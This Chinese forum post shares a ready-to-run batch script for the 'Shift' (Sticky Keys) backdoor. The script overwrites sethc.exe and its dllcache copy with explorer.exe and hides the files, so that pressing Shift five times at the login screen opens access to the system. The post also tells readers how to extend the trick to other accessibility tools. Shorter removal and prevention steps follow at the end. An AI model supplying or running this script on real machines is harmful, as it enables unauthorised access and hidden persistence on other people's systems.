shift后门批处理代码与shift后门清除方法分享
在cmd下输入以下命令... <br />下面再打开记事本把底下的代码粘贴进去。 <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode11"> <br />@echo off <br />cls <br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <br />echo. <br />echo Shift后门 <br />echo.sproink <br />@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe <br />@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe <br />@attrib c:\windows\system32\sethc.exe +h <br />@attrib c:\windows\system32\dllcache\sethc.exe +h <br />echo 使用方法:本文件执行完毕后, <br />echo 在终端界面按Shift 5次即可登陆系统! <br />echo. <br />copy c:\windows\explorer.exe c:\windows\system32\sethc.exe <br />echo 完成百分之 50 <br />copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe <br />echo 完成百分之 80 <br />attrib c:\windows\system32\sethc.exe +h <br />echo 完成百分之 90 <br />attrib c:\windows\system32\dllcache\sethc.exe +h <br />echo 完成百分之 100 <br />cls <br />echo. <br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <br />echo 后门安装完毕! <br />echo. <br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <br />echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <br />echo. <br />echo. & pause <br />exit <br /></div><br />其实原理很简单,就是利用了explorer.exe 这个资源管理器进程替换调用的shift 默认启动程序,然后还覆盖了windows的文件保护原文件(防止文件保护系统检测到文件修改,会还原这些原来的程序,造成copy文件失去作用),当调用shift是其实调用的真正程序是桌面进程。Lyon: 同理,你也可以利用此方法替换屏幕键盘及放大镜和组合键:win+u,其它自己可以拓展思路^_^ <br />下面介绍如何清除此后门... <br />打开控制面板--辅助功能选项--粘滞键--设置--去掉使用快捷键的勾 <br /><img border="0" alt="" src="https://img.jbzj.com/do/uploads/userup/1104/0F120055410.gif" width="368" height="450" /><br />还有要改下copy.exe的权限,不过在这里推荐大家把c盘所有的程序都 改下,只有administrator才能访问 <br /><br />shift后门的预防解决办法:预防很简单的,连敲5次shift,然后在弹出的设置里面取消连滞键 <br />已经中了的话 <br />attrib c:\windows\system32\sethc.exe -h <br />attrib c:\windows\system32\dllcache\sethc.exe -h <br />拷贝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目录下;拷贝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目录下 <br />还有就是在c:\windows\system32及c:\windows\system32\dllcache\下找到sethc.exe 禁止所有用户权限或拒绝访问等,也可:)建议利用前者恢复。。。 <br />收工!
頁:
[1]